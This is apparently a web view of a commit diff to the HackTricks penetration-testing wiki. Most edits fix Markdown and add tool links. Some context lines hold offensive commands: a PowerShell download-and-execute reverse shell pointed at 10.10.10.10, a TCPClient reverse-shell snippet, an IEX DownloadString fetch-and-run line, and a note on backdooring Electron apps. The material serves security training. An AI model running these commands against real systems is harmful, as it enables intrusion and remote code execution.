maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

impr

Browse Source
This commit is contained in:
Carlos Polop 2025-04-07 02:44:44 +02:00
parent afe4ea8fd5
commit 72f20a3fa2
114 changed files with 1218 additions and 697 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
src/SUMMARY.md
View File

@ -284,8 +284,10 @@
- [Places to steal NTLM creds](windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
- [Lateral Movement](windows-hardening/lateral-movement/README.md)
- [AtExec / SchtasksExec](windows-hardening/lateral-movement/atexec.md)
- [DCOM Exec](windows-hardening/lateral-movement/dcom-exec.md)
- [DCOM Exec](windows-hardening/lateral-movement/dcomexec.md)
- [PsExec/Winexec/ScExec](windows-hardening/lateral-movement/psexec-and-winexec.md)
- [RDPexec](windows-hardening/lateral-movement/rdpexec.md)
- [SCMexec](windows-hardening/lateral-movement/scmexec.md)
- [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md)
- [WinRM](windows-hardening/lateral-movement/winrm.md)
- [WmiExec](windows-hardening/lateral-movement/wmiexec.md)
@ -299,6 +301,7 @@
- [PowerView/SharpView](windows-hardening/basic-powershell-for-pentesters/powerview.md)
- [Antivirus (AV) Bypass](windows-hardening/av-bypass.md)
- [Cobalt Strike](windows-hardening/cobalt-strike.md)
- [Mythic](windows-hardening/mythic.md)
# 📱 Mobile Pentesting

2
src/backdoors/salseo.md
View File

@ -10,7 +10,7 @@ Compile those projects for the architecture of the windows box where your are go
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
(**If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
![](<../images/image (132).png>)

2
src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
View File

@ -245,7 +245,7 @@ Let's explain this final ROP.\
The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
**This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\*
**This way the exploit will execute a _/bin/sh_ shell.**
![](<../../../../images/image (165).png>)

2
src/binary-exploitation/stack-overflow/README.md
View File

@ -27,7 +27,7 @@ void vulnerable() {
The most common way to find stack overflows is to give a very big input of `A`s (e.g. `python3 -c 'print("A"*1000)'`) and expect a `Segmentation Fault` indicating that the **address `0x41414141` was tried to be accessed**.
Moreover, once you found that there is Stack Overflow vulnerability you will need to find the offset until it's possible to **overwrite the return address**, for this it's usually used a **De Bruijn sequence.** Which for a given alphabet of size _k_ and subsequences of length _n_ is a **cyclic sequence in which every possible subsequence of length \_n**\_\*\* appears exactly once\*\* as a contiguous subsequence.
Moreover, once you found that there is Stack Overflow vulnerability you will need to find the offset until it's possible to **overwrite the return address**, for this it's usually used a **De Bruijn sequence.** Which for a given alphabet of size _k_ and subsequences of length _n_ is a **cyclic sequence in which every possible subsequence of length _n_ appears exactly once** as a contiguous subsequence.
This way, instead of needing to figure out which offset is needed to control the EIP by hand, it's possible to use as padding one of these sequences and then find the offset of the bytes that ended overwriting it.

2
src/crypto-and-stego/crypto-ctfs-tricks.md
View File

@ -212,7 +212,7 @@ krodfdudfrod
**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
For example: 2=A, 22=B, 222=C, 3=D...\
You can identify this code because you will see\*\* several numbers repeated\*\*.
You can identify this code because you will see** several numbers repeated**.
You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)

2
src/cryptography/crypto-ctfs-tricks.md
View File

@ -212,7 +212,7 @@ krodfdudfrod
**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
For example: 2=A, 22=B, 222=C, 3=D...\
You can identify this code because you will see\*\* several numbers repeated\*\*.
You can identify this code because you will see** several numbers repeated**.
You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)

2
src/forensics/basic-forensic-methodology/anti-forensic-techniques.md
View File

@ -4,7 +4,7 @@
# Timestamps
An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` ** and ** `$FILE_NAME`.
It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION`**and**`$FILE_NAME`.
Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).

2
src/generic-hacking/exfiltration.md
View File

@ -362,7 +362,7 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
## DNS
- [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
- [https://github.com/Stratiz/DNS-Exfil](https://github.com/Stratiz/DNS-Exfil)
{{#include ../banners/hacktricks-training.md}}

2
src/generic-hacking/tunneling-and-port-forwarding.md
View File

@ -193,7 +193,7 @@ To note:
> [!WARNING]
> In this case, the **port is opened in the beacon host**, not in the Team Server and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port
```
```bash
rportfwd_local [bind port] [forward host] [forward port]
rportfwd_local stop [bind port]
```

2
src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View File

@ -54,7 +54,7 @@ Inveigh is a tool for penetration testers and red teamers, designed for Windows
Inveigh can be operated through PowerShell:
```powershell
```bash
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```

2
src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
View File

@ -20,7 +20,7 @@ You could also **abuse a mount to escalate privileges** inside the container.
- `--userns=host`
- `--uts=host`
- `--cgroupns=host`
- \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt`
- **`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined`** -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt`
- Run `fdisk -l` in the host to find the `</dev/sda1>` device to mount
- **`-v /tmp:/host`** -> If for some reason you can **just mount some directory** from the host and you have access inside the host. Mount it and create a **`/bin/bash`** with **suid** in the mounted directory so you can **execute it from the host and escalate to root**.

2
src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
View File

@ -25,7 +25,7 @@ Coming at some point of 2023...
#### openssl
\***\*[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed\*\* by the software that is going to be running inside the container.
\***\*[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed** by the software that is going to be running inside the container.
{{#include ../../../banners/hacktricks-training.md}}

2
src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
View File

@ -199,7 +199,7 @@ cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```
To **open** the **raw image** you can use **GIMP**, select the \*\*`screen.raw` \*\* file and select as file type **Raw image data**:
To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**:
![](<../../../images/image (463).png>)

2
src/linux-hardening/privilege-escalation/linux-active-directory.md
View File

@ -70,7 +70,7 @@ This procedure will attempt to inject into various sessions, indicating success
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.
Invoking \*\*`SSSDKCMExtractor` \*\* with the --database and --key parameters will parse the database and **decrypt the secrets**.
Invoking **`SSSDKCMExtractor`** with the --database and --key parameters will parse the database and **decrypt the secrets**.
```bash
git clone https://github.com/fireeye/SSSDKCMExtractor

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
View File

@ -143,7 +143,7 @@ ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where
- **`lsl`**, **`lsr`**, **`asr`**, **`ror`, `rrx`**:
- **Logical shift left**: Add 0s from the end moving the other bits forward (multiply by n-times 2)
- **Logical shift right**: Add 1s at the beginning moving the other bits backward (divide by n-times 2 in unsigned)
- **Arithmetic shift right**: Like **`lsr`**, but instead of adding 0s if the most significant bit is a 1, \*\*1s are added (\*\*divide by ntimes 2 in signed)
- **Arithmetic shift right**: Like **`lsr`**, but instead of adding 0s if the most significant bit is a 1, **1s are added (**divide by ntimes 2 in signed)
- **Rotate right**: Like **`lsr`** but whatever is removed from the right it's appended to the left
- **Rotate Right with Extend**: Like **`ror`**, but with the carry flag as the "most significant bit". So the carry flag is moved to the bit 31 and the removed bit to the carry flag.
- **`bfm`**: **Bit Filed Move**, these operations **copy bits `0...n`** from a value an place them in positions **`m..m+n`**. The **`#s`** specifies the **leftmost bit** position and **`#r`** the **rotate right amount**.
@ -250,7 +250,7 @@ ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment th
Armv8-A support the execution of 32-bit programs. **AArch32** can run in one of **two instruction sets**: **`A32`** and **`T32`** and can switch between them via **`interworking`**.\
**Privileged** 64-bit programs can schedule the **execution of 32-bit** programs by executing a exception level transfer to the lower privileged 32-bit.\
Note that the transition from 64-bit to 32-bit occurs with a lower of the exception level (for example a 64-bit program in EL1 triggering a program in EL0). This is done by setting the **bit 4 of** **`SPSR_ELx`** special register **to 1** when the `AArch32` process thread is ready to be executed and the rest of `SPSR_ELx` stores the **`AArch32`** programs CPSR. Then, the privileged process calls the **`ERET`** instruction so the processor transitions to **`AArch32`** entering in A32 or T32 depending on CPSR\*\*.\*\*
Note that the transition from 64-bit to 32-bit occurs with a lower of the exception level (for example a 64-bit program in EL1 triggering a program in EL0). This is done by setting the **bit 4 of** **`SPSR_ELx`** special register **to 1** when the `AArch32` process thread is ready to be executed and the rest of `SPSR_ELx` stores the **`AArch32`** programs CPSR. Then, the privileged process calls the **`ERET`** instruction so the processor transitions to **`AArch32`** entering in A32 or T32 depending on CPSR**.**
The **`interworking`** occurs using the J and T bits of CPSR. `J=0` and `T=0` means **`A32`** and `J=0` and `T=1` means **T32**. This basically traduces on setting the **lowest bit to 1** to indicate the instruction set is T32.\
This is set during the **interworking branch instructions,** but can also be set directly with other instructions when the PC is set as the destination register. Example:

8
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
View File

@ -431,6 +431,8 @@ Therefore, if you want to abuse entitlements to access the camera or microphone
## Automatic Injection
- [**electroniz3r**](https://github.com/r3ggi/electroniz3r)
The tool [**electroniz3r**](https://github.com/r3ggi/electroniz3r) can be easily used to **find vulnerable electron applications** installed and inject code on them. This tool will try to use the **`--inspect`** technique:
You need to compile it yourself and can use it like this:
@ -471,6 +473,12 @@ The webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984d
Shell binding requested. Check `nc 127.0.0.1 12345`
```
- [https://github.com/boku7/Loki](https://github.com/boku7/Loki)
Loki was designed to backdoor Electron applications by replacing the applications JavaScript files with the Loki Command & Control JavaScript files.
## References
- [https://www.electronjs.org/docs/latest/tutorial/fuses](https://www.electronjs.org/docs/latest/tutorial/fuses)

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
View File

@ -118,7 +118,7 @@ In this example we have only defined 1 function in the definitions, but if we wo
If the function was expected to send a **reply** the function `mig_internal kern_return_t __MIG_check__Reply__<name>` would also exist.
Actually it's possible to identify this relation in the struct **`subsystem_to_name_map_myipc`** from **`myipcServer.h`** (**`subsystem*to_name_map*\***`\*\* in other files):
Actually it's possible to identify this relation in the struct **`subsystem_to_name_map_myipc`** from **`myipcServer.h`** (**`subsystem*to_name_map*\***`** in other files):
```c
#ifndef subsystem_to_name_map_myipc

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View File

@ -536,7 +536,7 @@ If you have **`kTCCServiceEndpointSecurityClient`**, you have FDA. End.
### User TCC DB to FDA
Obtaining **write permissions** over the **user TCC** database you \*\*can'\*\*t grant yourself **`FDA`** permissions, only the one that lives in the system database can grant that.
Obtaining **write permissions** over the **user TCC** database you **can'**t grant yourself **`FDA`** permissions, only the one that lives in the system database can grant that.
But you can **can** give yourself **`Automation rights to Finder`**, and abuse the previous technique to escalate to FDA\*.

2
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -64,7 +64,7 @@ Pay special attention to **firebase URLs** and check if it is bad configured. [M
### Basic understanding of the application - Manifest.xml, strings.xml
The **examination of an application's \_Manifest.xml**_\*\* and \*\*_**strings.xml**\_\*\* files can reveal potential security vulnerabilities\*\*. These files can be accessed using decompilers or by renaming the APK file extension to .zip and then unzipping it.
The **examination of an application's _Manifest.xml_ and **_strings.xml_** files can reveal potential security vulnerabilities**. These files can be accessed using decompilers or by renaming the APK file extension to .zip and then unzipping it.
**Vulnerabilities** identified from the **Manifest.xml** include:

2
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
View File

@ -164,7 +164,7 @@ A exported service is declared inside the Manifest.xml:
<service android:name=".AuthService" android:exported="true" android:process=":remote"/>
```
Inside the code **check** for the \*\*`handleMessage`\*\*function which will **receive** the **message**:
Inside the code **check** for the **`handleMessage`**function which will **receive** the **message**:
![](<../../../images/image (82).png>)

6
src/network-services-pentesting/5984-pentesting-couchdb.md
View File

@ -46,7 +46,7 @@ These are the endpoints where you can access with a **GET** request and extract
- **`/_active_tasks`** List of running tasks, including the task type, name, status and process ID.
- **`/_all_dbs`** Returns a list of all the databases in the CouchDB instance.
- \*\*`/_cluster_setup`\*\*Returns the status of the node or cluster, per the cluster setup wizard.
- **`/_cluster_setup`**Returns the status of the node or cluster, per the cluster setup wizard.
- **`/_db_updates`** Returns a list of all database events in the CouchDB instance. The existence of the `_global_changes` database is required to use this endpoint.
- **`/_membership`** Displays the nodes that are part of the cluster as `cluster_nodes`. The field `all_nodes` displays all nodes this node knows about, including the ones that are part of the cluster.
- **`/_scheduler/jobs`** List of replication jobs. Each job description will include source and target information, replication id, a history of recent event, and a few other things.
@ -58,8 +58,8 @@ These are the endpoints where you can access with a **GET** request and extract
- **`/_node/{node-name}/_system`** The \_systemresource returns a JSON object containing various system-level statistics for the running server\_.\_ You can use \_\_`_local` as {node-name} to get current node info.
- **`/_node/{node-name}/_restart`**
- **`/_up`** Confirms that the server is up, running, and ready to respond to requests. If [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance_mode) is `true` or `nolb`, the endpoint will return a 404 response.
- \*\*`/_uuids`\*\*Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance.
- \*\*`/_reshard`\*\*Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster.
- **`/_uuids`**Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance.
- **`/_reshard`**Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster.
More interesting information can be extracted as explained here: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)

20
src/network-services-pentesting/5985-5986-pentesting-winrm.md
View File

@ -17,7 +17,7 @@ An open port from the list above signifies that WinRM has been set up, thus perm
To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted:
```powershell
```bash
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
@ -26,7 +26,7 @@ This approach involves adding a wildcard to the `trustedhosts` configuration, a
Moreover, WinRM can be **activated remotely** using the `wmic` command, demonstrated as follows:
```powershell
```bash
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
@ -54,7 +54,7 @@ The response should contain information about the protocol version and wsmid, si
To execute `ipconfig` remotely on a target machine and view its output do:
```powershell
```bash
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
@ -62,19 +62,19 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al
You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
```powershell
```bash
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
### Execute a Script
```powershell
```bash
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
### Get reverse-shell
```powershell
```bash
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
@ -82,7 +82,7 @@ Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep
To get an interactive PowerShell shell use `Enter-PSSession`:
```powershell
```bash
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
@ -107,7 +107,7 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New
To use PS Remoting and WinRM but the computer isn't configured, you could enable it with:
```powershell
```bash
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
@ -115,7 +115,7 @@ To use PS Remoting and WinRM but the computer isn't configured, you could enable
This **won't work** if the the **language** is **constrained** in the remote computer.
```powershell
```bash
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
@ -129,7 +129,7 @@ Enter-PSSession -Session $sess1
Inside this sessions you can load PS scripts using _Invoke-Command_
```powershell
```bash
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```

2
src/network-services-pentesting/8089-splunkd.md
View File

@ -82,7 +82,7 @@ Deployment is straightforward:
Sample Windows PowerShell reverse shell:
```powershell
```bash
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};

2
src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md
View File

@ -7,7 +7,7 @@
### Manual
1. Connect to vulnerable FTP
2. Use \*\*`PORT`\*\*or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\<IP:Port>_ you want to scan:
2. Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\<IP:Port>_ you want to scan:
`PORT 172,32,80,80,0,8080`\
`EPRT |2|172.32.80.80|8080|`

4
src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View File

@ -526,7 +526,7 @@ msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
Or a **PS** script:
```powershell
```bash
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184
@ -579,7 +579,7 @@ msf> auxiliary/admin/mssql/mssql_escalate_execute_as
or with a **PS** script:
```powershell
```bash
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

4
src/network-services-pentesting/pentesting-rdp.md
View File

@ -123,6 +123,10 @@ net localgroup "Remote Desktop Users" UserLoginName /add
- Execute arbitrary SHELL and PowerShell commands on the target without uploading files
- Upload and download files to/from the target even when file transfers are disabled on the target
- [**SharpRDP**](https://github.com/0xthirteen/SharpRDP)
This tool allows to execute commands in the victim RDP **without needing a graphical interface**.
## HackTricks Automatic Commands
```

10
src/network-services-pentesting/pentesting-smb.md
View File

@ -64,7 +64,7 @@ nbtscan -r 192.168.0.1/24
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
- Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb_version**
- Use the **MSF** auxiliary module _**auxiliary/scanner/smb/smb_version**_
- Or this script:
```bash
@ -275,7 +275,7 @@ smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED o
PowerShell
```powershell
```bash
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
@ -342,7 +342,7 @@ Commands:
### Domain Shared Folders Search
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
@ -358,6 +358,10 @@ sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'De
Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
- [**PowerHuntShares**](https://github.com/NetSPI/PowerHuntShares)
- `IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")`
- `Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test`
> [!NOTE]
> The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
> You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.

8
src/network-services-pentesting/pentesting-smb/README.md
View File

@ -4,7 +4,7 @@
## **Port 139**
The _**Network Basic Input Output System**_\*\* (NetBIOS)\*\* is a software protocol designed to enable applications, PCs, and Desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. The identification and location of software applications operating on a NetBIOS network are achieved through their NetBIOS names, which can be up to 16 characters in length and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) utilizing **TCP Port 139**.
The _**Network Basic Input Output System**_** (NetBIOS)** is a software protocol designed to enable applications, PCs, and Desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. The identification and location of software applications operating on a NetBIOS network are achieved through their NetBIOS names, which can be up to 16 characters in length and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) utilizing **TCP Port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
@ -64,7 +64,7 @@ nbtscan -r 192.168.0.1/24
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
- Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb_version**
- Use the **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
- Or this script:
```bash
@ -275,7 +275,7 @@ smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED o
PowerShell
```powershell
```bash
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
@ -342,7 +342,7 @@ Commands:
### Domain Shared Folders Search
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data

2
src/network-services-pentesting/pentesting-snmp/README.md
View File

@ -82,7 +82,7 @@ The are **2 types of community strings**:
- **`private`** **Read/Write** in general
Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\
If you try to **write** an object a **`noSuchName` or `readOnly` error** is received\*\*.\*\*
If you try to **write** an object a **`noSuchName` or `readOnly` error** is received**.**
In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**.

4
src/network-services-pentesting/pentesting-voip/README.md
View File

@ -671,9 +671,9 @@ Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando
There are several ways to try to achieve DoS in VoIP servers.
- **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)\*\*: SIPPTS flood sends unlimited messages to the target.
- **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood sends unlimited messages to the target.
- `sippts flood -i 10.10.0.10 -m invite -v`
- **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)\*\*: SIPPTS ping makes a SIP ping to see the server response time.
- **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping makes a SIP ping to see the server response time.
- `sippts ping -i 10.10.0.10`
- [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
- [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.

2
src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
View File

@ -44,7 +44,7 @@ Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE,
If _/path_ is blocked:
- Try using _**/**_**%2e/path \_(if the access is blocked by a proxy, this could bypass the protection). Try also**\_\*\* /%252e\*\*/path (double URL encode)
- Try using `/%2e/path` (if the access is blocked by a proxy, this could bypass the protection). Try also `/%252e**/path` (double URL encode)
- Try **Unicode bypass**: _/**%ef%bc%8f**path_ (The URL encoded chars are like "/") so when encoded back it will be _//path_ and maybe you will have already bypassed the _/path_ name check
- **Other path bypasses**:
- site.com/secret > HTTP 403 Forbidden

2
src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
View File

@ -79,7 +79,7 @@ module.exports.getGPUDriverVersions = async () => {
}
```
Usually the _execa_ tries to execute "_nvidia-smi.exe_", which is specified in the `nvidiaSmiPath` variable, however, due to the overridden `RegExp.prototype.test` and `Array.prototype.join`, **the argument is replaced to "**_**calc**_**" in the \_execa**\_**'s internal processing**.
Usually the _execa_ tries to execute "_nvidia-smi.exe_", which is specified in the `nvidiaSmiPath` variable, however, due to the overridden `RegExp.prototype.test` and `Array.prototype.join`, **the argument is replaced to "**_**calc**_**" in the _execa**_**'s internal processing**.
Specifically, the argument is replaced by changing the following two parts.

2
src/network-services-pentesting/pentesting-web/imagemagick-security.md
View File

@ -45,7 +45,7 @@ The effectiveness of a security policy can be confirmed using the `identify -lis
## References
- [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html\*\*](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
- [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
{{#include ../../banners/hacktricks-training.md}}

2
src/network-services-pentesting/pentesting-web/moodle.md
View File

@ -72,7 +72,7 @@ I found that the automatic tools are pretty **useless finding vulnerabilities af
## **RCE**
You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab\*\*:\*\*
You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab**:**
![](<../../images/image (630).png>)

2
src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
View File

@ -175,7 +175,7 @@ Check:
## More tricks
- **register_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables\*\* that are used within the code.
- **register_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code.
- The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
- When you have the **usernames** of the users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.

2
src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
View File

@ -552,7 +552,7 @@ uid_t getuid(void){
#### Bypass using Chankro
In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell.
